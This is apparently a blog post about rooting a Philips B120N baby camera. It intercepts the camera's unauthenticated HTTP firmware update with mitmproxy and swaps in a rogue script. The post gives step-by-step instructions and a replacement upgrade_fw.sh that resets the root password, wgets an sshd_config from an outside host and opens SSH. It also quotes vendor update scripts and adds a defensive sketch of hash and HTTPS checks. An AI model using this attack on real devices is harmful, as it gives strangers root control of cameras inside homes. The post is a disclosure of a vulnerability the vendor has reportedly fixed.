Gaining Root Access on Philips B120N Babycam

Update: I have a new Philips babycam and rooted it again, so I added some more info.

This is an older post. After I contacted Philips, they told me they had received a report of this issue months prior to my report. In the new firmware these problems no longer exist, but that doesn’t mean the B120N is flawless: when you reset the babycam it reverts to the old firmware, and you can root it.

I wanted to try rooting my B120N cam and tried to follow Paul Price’s “Owning Philips In.Sight IP Cameras”, but unfortunately Philips decided to close all interesting ports in the firmware version my cam was running.

I did find a way to gain root access, and I wanted to add a recording of the process so you can try it yourself.

I set up my Linux box as a ‘router’ with mitmproxy and a hotspot, connecting my ethernet port and directing traffic through hotspot -> mitmproxy -> internet.

In short, the steps you need to follow:

  1. Install mitmproxy on your PC / notebook (plenty of good tutorials available online), to be able to capture traffic and alter responses.
  2. Set up a hotspot, where you will connect your phone and camera.
  3. Connect your phone, run the Insight app, and configure your cam / scan the QR code.
  4. Your camera will now connect to the wifi. Once the Insight app asks you if you want to upgrade, press ‘i’ in mitmproxy and set the filter to .* to capture all traffic and halt on every request.
  5. Click yes on the upgrade prompt in the Insight app.
  6. Press the ‘a’ key to allow the requests line by line, until you reach the upgrade_fw.sh line (don’t press ‘a’ on that line; we want to modify this request).
  7. Hit enter on the upgrade_fw.sh line and press ‘e’ to edit the request.
  8. There will be an option to edit the URL (I think it’s ‘u’). Point the request URL to ‘http://yoururl.com/upgrade_fw.sh’ (where you host your own shell script and sshd_config file), press enter, and hit ‘a’ to allow the request to complete.
  9. You now have root access to your camera.

Below you can find a sample upgrade_fw.sh and sshd_config you can use to complete the rooting.

For this setup I used mitmproxy to capture the traffic from the B120N when it was freshly connected to my wifi network.

When opening the mobile application I immediately got a message to update my cam’s firmware. When I hit update I saw multiple requests passing through:

http://philips.iv-cdn.com/upgrade_fw.sh

So I noticed: no HTTPS request. OK, that makes my life a little easier.

To get root access I needed to replace the current sshd_config with my own, to open up an ssh port.

Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

# The default requires explicit activation of protocol 1
#Protocol 2

# Logging
# obsoletes QuietMode and FascistLogging
#SyslogFacility AUTH
#LogLevel INFO
HostKey /etc/ssh_host_rsa_key
HostKey /etc/ssh_host_dsa_key
# Authentication:

#LoginGraceTime 2m
#PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

RSAAuthentication yes
PubkeyAuthentication yes

AuthorizedKeysFile .ssh/authorized_keys
#RhostsRSAAuthentication no
#HostbasedAuthentication no

PasswordAuthentication yes
#PermitEmptyPasswords yes
#AllowUsers thomas
# Change to no to disable s/key passwords
#ChallengeResponseAuthentication yes

#UsePAM no


# override default of no subsystems
#Subsystem sftp /usr/libexec/sftp-server

I captured the request for upgrade_fw.sh and redirected it to my own sh file, where I reset the password of root (yes, the root user is downloading the updates, and no, there is no check on the validity or origin of the file with hashing) and copy my sshd_config to the system, to open up port 22.

echo -e "newrootpass\nnewrootpass" | passwd root

#Now load your own sshd_config to open up a port
wget  http://myurl.com/sshd_config  -O /tmp/sshd_config

mv -f /tmp/sshd_config /etc/sshd_config
sync
reboot

And you are in 🙂
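
The check that is missing above (the update script is fetched over plain HTTP and run as root without any validation of its origin or content), sketched from the defender's side. This is an added example, not Philips or Ivideon code; the host `updates.example.invalid`, the function names and the idea that the expected digest comes from an authenticated source (a signed manifest or a value shipped in the firmware) are assumptions.

```shell
#!/bin/sh
# Added example: gate an update script on transport and integrity checks
# before it is ever executed. All names here are hypothetical.

# SHA-256 of a file as a bare hex string (sha256sum, or shasum as a fallback).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Accept only HTTPS URLs on the one expected update host (assumed name).
url_is_acceptable() {
    case "$1" in
        https://updates.example.invalid/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Compare the file with a digest obtained out of band. The digest must come
# from an authenticated source; a hash fetched over the same plain-HTTP
# channel as the file can be replaced together with it.
verify_digest() {
    file="$1"; expected="$2"
    [ -f "$file" ] || return 1
    actual=$(sha256_of "$file")
    [ "$actual" = "$expected" ]
}

# Execute the downloaded script only when both checks pass.
# Returns 2 for a rejected URL, 3 for a digest mismatch.
run_update_if_trusted() {
    url="$1"; file="$2"; expected="$3"
    url_is_acceptable "$url" || { echo "reject: untrusted url $url" >&2; return 2; }
    verify_digest "$file" "$expected" || { echo "reject: digest mismatch" >&2; return 3; }
    sh "$file"
}
```

With a gate like this, the redirected request in step 8 fails twice: the rewritten URL is not on the expected HTTPS host, and the substituted script does not match the expected digest.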

Some more digging

Excerpt from file source code:

#!/bin/bash

set -eux

CDN_URL="http://philips.iv-cdn.com"
VS_PACKAGE="ivideon-server.tgz"
FW_UPDATES_PACKAGE="fw_updates.tgz"
IVIDEON_DIR="/opt/ivideon"
IVIDEON_TMP_DIR="${IVIDEON_DIR}/tmp"
IVIDEON_ENV="/etc/ivideon.env"
REBOOT_TOOL="/opt/ivideon/videoserverd/tools/reboot.sh"
UPGRADE_LOG_FILE="/mnt/adc/ivideon_upgrade.log"
IVIDEON_LAST_UPGRADE_DEBUG_LOG="/mnt/adc/ivideon_last_upgrade_debug.log"
VIDEOSERVERD="/opt/ivideon/videoserverd/videoserverd"

main_impl() {
    if [[ -e "${IVIDEON_ENV}" ]]; then
        . "${IVIDEON_ENV}"
    fi

    rotate_log 2048
    local version_tag="${1-release}"
    local vs_version=$("${VIDEOSERVERD}" -v)

    log_message "Upgrade FW from ${vs_version} to '${version_tag}'\n"

    case "${version_tag}" in
        latest|alpha|beta|release|dev|3.3.28|3.4.0)
            ;;
        ssh-fix)
            wget http://philips.iv-cdn.com/conf/update.sh -O /tmp/update.sh
            sh /tmp/update.sh
            touch /mnt/adc/.ssh_updated
            sync
            reboot
            ;;
        *)
            version_tag=release
            ;;
    esac

    log_message "Effective FW version tag: ${version_tag}.\n"

    cd /tmp
    case "${IVIDEON_CAMERA_TAG-}" in
        m115|m120|b120)
            download_and_check_md5 "${IVIDEON_CAMERA_TAG}/ivideon-server_${version_tag}_philips-m120" "${VS_PACKAGE}" || return 1
            download_and_check_md5 "${IVIDEON_CAMERA_TAG}/fw_updates_${version_tag}" "${FW_UPDATES_PACKAGE}" || return 1
            mv_files_to_ivideon_dir "${FW_UPDATES_PACKAGE}" "${VS_PACKAGE}" || return 1
            ;;
        *)
            download_and_check_md5 "ivideon-server_${version_tag}_philips-m120" "${VS_PACKAGE}" || return 1
            mv_files_to_ivideon_dir "${VS_PACKAGE}" || return 1
            ;;
    esac
}

main "$@"

Looking at the highlighted part, I see some files are being downloaded; it looks like camera firmware and ivideon server code. Always nice to browse and look around 🙂

http://philips.iv-cdn.com/b120/fw_updates_release.tar.gz
http://philips.iv-cdn.com/b120/ivideon-server_release_philips-m120.tar.gz

This update script is downloaded and run:

#!/bin/sh

set -e

mkdir -p /tmp/conf

cp /etc/shadow /tmp/conf/
cp /etc/inittab /tmp/conf
cp /etc/sshd_config /tmp/conf/

wget  http://philips.iv-cdn.com/conf/inittab -O /tmp/inittab
wget  http://philips.iv-cdn.com/conf/shadow -O /tmp/shadow
wget  http://philips.iv-cdn.com/conf/sshd_config  -O /tmp/sshd_config
wget  http://philips.iv-cdn.com/conf/additional_vs_info.sh  -O /opt/ivideon/videoserverd/tools/additional_vs_info.sh

chmod +x /opt/ivideon/videoserverd/tools/additional_vs_info.sh

mv -f /tmp/inittab /etc/inittab

mv -f /tmp/shadow /etc/shadow && chmod 600 /etc/shadow
chown 0:0 /etc/shadow

mv -f /tmp/sshd_config /etc/sshd_config